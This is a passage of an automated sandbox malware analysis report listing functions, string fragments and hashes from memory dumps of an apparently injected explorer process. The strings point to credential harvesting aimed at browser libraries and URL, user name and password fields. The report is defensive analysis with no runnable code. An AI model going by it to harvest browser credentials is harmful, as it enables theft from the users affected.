c, xrefs: 106D7697
d, xrefs: 106D76CF
d, xrefs: 106D767B
w, xrefs: 106D76B3
l, xrefs: 106D76D6
t, xrefs: 106D76C8

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 09270157ab0dfd0d6aa8097b7da88d62a42a68eec64aa98aa5f4a063cbedd8ab
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: AB41B170B18B488FDB54DF88A4466BD7BE2FB48700F00025EE849D3345EBB5AD458BD6

Function 1055B622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

p, xrefs: 1055B690
s, xrefs: 1055B689
i, xrefs: 1055B69E
d, xrefs: 1055B6CF
e, xrefs: 1055B66D
d, xrefs: 1055B67B
2, xrefs: 1055B674
w, xrefs: 1055B6B3
n, xrefs: 1055B6BA
l, xrefs: 1055B682
t, xrefs: 1055B6C8
c, xrefs: 1055B697
u, xrefs: 1055B661
l, xrefs: 1055B6AC
d, xrefs: 1055B6A5
l, xrefs: 1055B6D6
n, xrefs: 1055B6C1

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: af476a69e06d78beb6cebad94c30d5a75bbea4b986dc4a27469cafc5dd4f8472
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 2E419270A18B08CFEF14DF88A44A6AD7BE6FB88700F00025EE449D7245DB75AD498BD6

Function 106DEAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

l, xrefs: 106DECE2
[, xrefs: 106DEBF6
[, xrefs: 106DEC66
D, xrefs: 106DECDA
[, xrefs: 106DECCD
[, xrefs: 106DEC90
[, xrefs: 106DEC2D
], xrefs: 106DEC3D
e, xrefs: 106DECA0
], xrefs: 106DECA8
n, xrefs: 106DEC98
c, xrefs: 106DEC0B
b, xrefs: 106DEC73
l, xrefs: 106DEC35

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: b0b15b09992df727024bb8d79d3c6b7e6087efa56170896fcf4df8fa0ff52def
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: CBC16D74619B099FC798EF64C8956EAF3E1FB98304F40472EA49AC7210DF30B555CB8A

Function 10562AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 10562C2D
[, xrefs: 10562BF6
b, xrefs: 10562C73
D, xrefs: 10562CDA
c, xrefs: 10562C0B
l, xrefs: 10562CE2
], xrefs: 10562CA8
[, xrefs: 10562C66
[, xrefs: 10562C90
e, xrefs: 10562CA0
l, xrefs: 10562C35
], xrefs: 10562C3D
[, xrefs: 10562CCD
n, xrefs: 10562C98

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: a43fee8f6e83bdfa5fc044edc98ae8011d0897ceee80a6b7d344851418ca9e4a
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 10C15A74618F098BC758EF64C48AAEAFBE5FB94304F40472AA59EC7210DF70A515CB86

Function 106DEF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 106DEFA0
r, xrefs: 106DEFB8
r, xrefs: 106DEFB0
c, xrefs: 106DEFC8
r, xrefs: 106DEF90
r, xrefs: 106DEFC0
r, xrefs: 106DEFA8
., xrefs: 106DEF63
r, xrefs: 106DEF88
n, xrefs: 106DEF6B
r, xrefs: 106DEF98
0, xrefs: 106DEF5B

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 21ed1d47b386af98f9e82daadec90e509cab965645297484607af077df5a9496
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 9E51E2305187488FD749CF58D8812AAB7E5FBC5700F501A2EF8CBC7242DBB4A946CB82

Function 10562F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 10562FC0
n, xrefs: 10562F6B
r, xrefs: 10562F98
., xrefs: 10562F63
r, xrefs: 10562F90
r, xrefs: 10562FB8
c, xrefs: 10562FC8
r, xrefs: 10562FA0
r, xrefs: 10562FA8
r, xrefs: 10562FB0
0, xrefs: 10562F5B
r, xrefs: 10562F88

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 09b8bc406130fd86a2e17d81108468aabcc09c3f04888e85bf7c84c66958b3e4
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: F251F87451C7488FD719CF18C4852AABBE5FBC5314F50592EE8CBC7242DBB49946CB82

Function 106D82F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 106D8327
4.dl, xrefs: 106D84DB
dragon_s.dll, xrefs: 106D8614
dll, xrefs: 106D832E
nspr, xrefs: 106D84D4
opera_browser.dll, xrefs: 106D8629
sspi, xrefs: 106D8320
l, xrefs: 106D84E2

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: eac2658af5920d8d5d041b88b8d6741d2b8737253e5f474ec7a3deececb02fa1
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 84C18074619B198FC798EF68D456AEAB3E1FB98300F514329A48EC7255DF30E902C7C9

Function 106D82F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 106D8327
4.dl, xrefs: 106D84DB
dragon_s.dll, xrefs: 106D8614
dll, xrefs: 106D832E
nspr, xrefs: 106D84D4
opera_browser.dll, xrefs: 106D8629
sspi, xrefs: 106D8320
l, xrefs: 106D84E2

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: a347a4f71cae0c229491399fca6ff9c4d7e26f4dd2f93b14b4c518b255e2e441
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: BDC17074619B198FC798EF68D456AEAB3E1FB98300F514329A48EC7255DF30E901C789

Function 1055C2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 1055C327
dragon_s.dll, xrefs: 1055C614
4.dl, xrefs: 1055C4DB
sspi, xrefs: 1055C320
dll, xrefs: 1055C32E
l, xrefs: 1055C4E2
opera_browser.dll, xrefs: 1055C629
nspr, xrefs: 1055C4D4

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 643d2ae8abc56fc1af2e982e6e11fea9939c2fe23ee3c488a1fb73d30e869e55
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 60C1B374618A194FC758EF68D45AAAABBE1FF94304F81432EA44EC7251DF30EA05CBC5

Function 1055C2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 1055C327
dragon_s.dll, xrefs: 1055C614
4.dl, xrefs: 1055C4DB
sspi, xrefs: 1055C320
dll, xrefs: 1055C32E
l, xrefs: 1055C4E2
opera_browser.dll, xrefs: 1055C629
nspr, xrefs: 1055C4D4

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 4bb5c34f95e44bcb55ef33dcfe7c5cdca42909b2a0ea64c16ffbb6801714e6f9
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 99C1B374618A194FC758EF68D45AAAABBE1FF98304F41432EA44EC7251DF30EA05CBC5

Function 106D9CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

User, xrefs: 106D9DAB
2, xrefs: 106D9DE1
L: , xrefs: 106D9D66
UR, xrefs: 106D9D5F
Pass, xrefs: 106D9D97
name, xrefs: 106D9DB2
word, xrefs: 106D9D9E

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: e1e1001caa436f669c60f6f8c5bc6f5c28f7c8f96164f7da40bc9b8e3a6df808
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 52A1CF70A18B488BDB59DFA8D444BEEB7E2FF88300F40462DE48AD7241EF309945C789

Function 1055DCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 1055DD9E
L: , xrefs: 1055DD66
2, xrefs: 1055DDE1
UR, xrefs: 1055DD5F
User, xrefs: 1055DDAB
Pass, xrefs: 1055DD97
name, xrefs: 1055DDB2

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 31267c6c39ab909b96d285196c0660c8c48445721e2db066b9b25c41eafad968
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 2FA1C2706187488FDB29DFA8D4497EEBBE1FF88304F40462EE48AD7251EF7095468785

Function 106D9CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

User, xrefs: 106D9DAB
2, xrefs: 106D9DE1
L: , xrefs: 106D9D66
UR, xrefs: 106D9D5F
Pass, xrefs: 106D9D97
name, xrefs: 106D9DB2
word, xrefs: 106D9D9E

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 75d0b8d193865fff09be68198f2a3bc73305224aafbb40158b376b99f9f5a01e
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 93919E70A18B488BDB59DFA8D444BEEB7E1FF98300F40462EE48AD7251EF709545C789

Function 1055DCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 1055DD9E
L: , xrefs: 1055DD66
2, xrefs: 1055DDE1
UR, xrefs: 1055DD5F
User, xrefs: 1055DDAB
Pass, xrefs: 1055DD97
name, xrefs: 1055DDB2

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: ec13c5531d0fc16e311907af67a0a4a33585a23ee6953e52cf6a7e07f5d78320
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: F89190706187488FDB29DFA8D4487EEBBE1FF98304F40462EE48AD7251EF7095498785

Function 106D9352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 106D94A0
e, xrefs: 106D948E
, xrefs: 106D947C
n, xrefs: 106D93E7
., xrefs: 106D93B0

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: d95158c3356e99a20a52e193996d01324f999f263a120e751e11294a90930075
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 9D71B230618B488FD754DFA8D4856AAB3F1FF94304F00062EE48AC7221EF70A9468B85

Function 1055D352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 1055D4A0
e, xrefs: 1055D48E
., xrefs: 1055D3B0
n, xrefs: 1055D3E7
, xrefs: 1055D47C

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 9c8cb06df7453769e0448087fda6fc0770130c067d8fbf16ad22a4c50c69bd01
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: DA7162356187498FD754EFA8C4896AABBF1FF94304F00062FE44AC7261EB71E9458B85

Function 106D4C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 106D4C9E
shel, xrefs: 106D4C90
ole3, xrefs: 106D4C5D
2.dl, xrefs: 106D4C64
l32., xrefs: 106D4C97

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: ec7bb601b87649b59b2fa2a491b3ed46f6cbbcd8e06c57dc45cae1226a0e64e6
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 36513FB0914B4C8FDB94DFA4C445AEEB7F1FF68300F40461EA49AD7214DF70A5418B89

Function 10558C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 10558C90
2.dl, xrefs: 10558C64
l32., xrefs: 10558C97
ole3, xrefs: 10558C5D
dll, xrefs: 10558C9E

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 6bc28b922b4d515887a232eb18dafa148bc2bc6048fa20f0ccbfe6004e8811bf
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 25514DB4918B4C8FDB54DFA4C045AEEBBF1FF58300F40462EA59AE7214EF70A5458B89

Function 106D586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 106D59E0
ion., xrefs: 106D58EC
4, xrefs: 106D59E9
dll, xrefs: 106D58F4
vers, xrefs: 106D58E4

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 18d0dedaf8c77adef47607e66ed9eea729a0a12683eb6898f14d36e7db398a81
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 18418234629B8D8FCBA5EF649845BEA73E4FB98301F41462E989EC7240EF30D5458786

Function 1055986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 105598F4
vers, xrefs: 105598E4
\, xrefs: 105599E0
ion., xrefs: 105598EC
4, xrefs: 105599E9

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 8635a88d00b8a2576ca1692c9979dff1fffb266eedcb0367ebe349cc9f4f5c40
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: B5418334218B488FCBA5DF28D8457EA77E5FBD9301F51462E989EC7241EF34D5058782

Function 106D74B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 106D74D3
dll, xrefs: 106D751C
cli., xrefs: 106D7515
32.d, xrefs: 106D74DA
sspi, xrefs: 106D750E

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: ebbb8ee0c005d0105f43dbce2435826149ef62e3d51aab0bb95457abb74536a2
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 78415930A19F4D9FCB84EF6890957AD73E1FB68300F51016AA88AD7310EE34D9408B87

Function 1055B4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 1055B515
32.d, xrefs: 1055B4DA
dll, xrefs: 1055B51C
sspi, xrefs: 1055B50E
user, xrefs: 1055B4D3

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: f5e414115b46b91f2f65f01dd27527c036b90264baa699615fd09ae96927d28a
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: C9418270A18E0D8FDF98EF68C0997AD7BE1FB58300F51456AA80ED7200FA31D9448BC6

Function 106D5432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 106D552A
h, xrefs: 106D551F
.dll, xrefs: 106D553F
el32, xrefs: 106D5537

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: dad58e42e13f09c6561598adcd66ef8e2a9936f71bb6f401da7e04c7f3930160
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 9941B270609B498FD799DF2890883AAB7E1FB98300F104A2F949EC7755DF70D945CB86

Function 10559432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 1055951F
.dll, xrefs: 1055953F
el32, xrefs: 10559537
kern, xrefs: 1055952A

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: ccd2c45cabc58ef631530f9a893c88dc473e8b5bcb2b648b44e772cbe27c8a51
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: FB416074608B498FD799DF2880893AABBE1FF99340F104A2F949EC3255DB74D949CB81

Function 106DC0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 106DC146
f fr, xrefs: 106DC13D
Snif, xrefs: 106DC154
, xrefs: 106DC184

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: fc169bf41d77cf5ab9ffd30820d878f7ee9237abf23345c7f3b43301e6e40069
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: AF31223101EB889FD35ADB28C4856EAB7D0FB84300F50481EF49BC7252EE30A549CB43

Function 105600B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 1056013D
Snif, xrefs: 10560154
, xrefs: 10560184
om:, xrefs: 10560146

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 9f0125533ce6922f535e502fa4520d121fbde95305daafd5a6449902913faf01
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: A131E37550CB886FD75ADB28C4896DABBE4FBD4300F50491EE49BC7252EE30A54ACB43

Function 106DC0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 106DC146
f fr, xrefs: 106DC13D
Snif, xrefs: 106DC154
, xrefs: 106DC184

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 4ac539ab6ce201df06886ce4f2bf299fc143755874f7c45da8598db0e9f538d8
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: E531007141AB4CAFD359DB29C8856EAB3D0FB94300F40491EF49BC7246EE30A54ACB46

Function 105600C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 1056013D
Snif, xrefs: 10560154
, xrefs: 10560184
om:, xrefs: 10560146

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
